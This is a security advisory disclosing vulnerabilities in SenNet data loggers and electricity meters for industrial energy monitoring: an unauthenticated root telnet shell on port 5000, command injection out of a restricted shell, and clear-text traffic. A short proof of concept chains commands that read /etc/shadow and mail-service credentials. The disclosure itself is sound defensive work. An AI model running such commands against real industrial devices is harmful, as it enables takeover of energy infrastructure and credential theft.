SenNet Data Logger appliances and Electricity Meters Multiple Vulnerabilities Note: Vendor has released the fix. Details to be documented in ICS-CERT Advisory. About SenNet is a trademark of Satel Spain that offers monitoring and remote-control solutions for businesses. Our engineers develop, integrate and test the products of SenNet in our facilities in Madrid (Spain). http://www.sennetmonitoring.com/wp-content/uploads/2016/05/Datasheet_owa31I-.pdf Vulnerable products SenNet Optimal DataLogger appliance SenNet Solar DataLogger appliance SenNet Multitask Meter Deployment Geography Americas and Europe regions Target Audience / Industry Energy, Power, Service Providers, Telecom Note: all appliances seem to be running on the same code base, and therefore, all SenNet models, and software versions stand vulnerable. Appliances Confirmed affected: SenNet Solar Datalogger Model: OWA3X Serial Number: A04WCJ Licence type: A02 Version: V5.03-1.56a SenNet Optimal Datalogger Model: OWA31 Serial Number: A05B89 License type: A02 Version: V5.37c-1.43c SenNet Multitask Meter Datalogger Model: OWA3X Serial Number: A04ZZ3 Licence type: A02 Version: V5.21a-1.18b SenNet Optimal is a monitoring solution to meter consumption (electricity, gas, water) and other variables (temperature, humidity, presence, lighting a|); both for industries and for businesses in the tertiary sector. http://www.sennetmonitoring.com/en/sennet-optimal-2/ SenNet Solar is a solution for monitoring. It is suitable for any kind of power generation plants. In this type of facilities, it is essential to monitor and remotely control the devices involved in the process: inverters, meters, trackers, etc. http://www.sennetmonitoring.com/en/sennet-solar/ SenNet Meter is an ideal device for electricity submetering. http://www.sennetmonitoring.com/en/electricity-meters/ Vulnerability Details 1. No access control on the remote shell The appliance runs ARM as underlying OS. Telnet access is enabled on TCP port 5000. There is no authentication required for accessing and connecting the remote shell. Any user can connect to the shell and issue commands. 2. Shell services running with excessive privileges (superuser) The service runs with superuser root privileges, thus giving privileged access to any user, without any authentication (exploited via OS Command Injection described nexe). 3. OS Command Injection The remote shell (attempts to) offer a restricted environment, and does not allow executing system commands. However, it is possible to break out of this jailed shell by chaining specific shell meta-characters and OS commands. The service / application is run as 'root' and OS command injection results in full system access. Apart from energy logging data, the device stores sensitive information such FTP, SMTP and other service login credentials, used by the application for functions, as well as to connect with other external, public facing servers. PoC: # telnet IP 5000 2>/dev/null Trying IP... Connected to IP. Escape character is '^A'. $ true; id; pwd; cat /etc/shadow; ps; cat /home/etc/ssmtp/ssmtp.conf; /bin/sh: $: not found uid=0(root) gid=0(root) /home root:$1$:13852:0:99999:7::: nobody:*:13852:0:99999:7::: nfsnobody:!!:13852:0:99999:7::: PID USER VSZ STAT COMMAND 1 root 2412 S init 2 root 0 SW AkthreaddA 3 root 0 SW Aksoftirqd/0A root=postmaster mailhub=:25 rewriteDomain=example.com hostname=_HOSTNAME_ 4. Insecure Transport - all communications are clear-text, and prone to sniffing. +++++ Metasploit module will be released shortly. +++++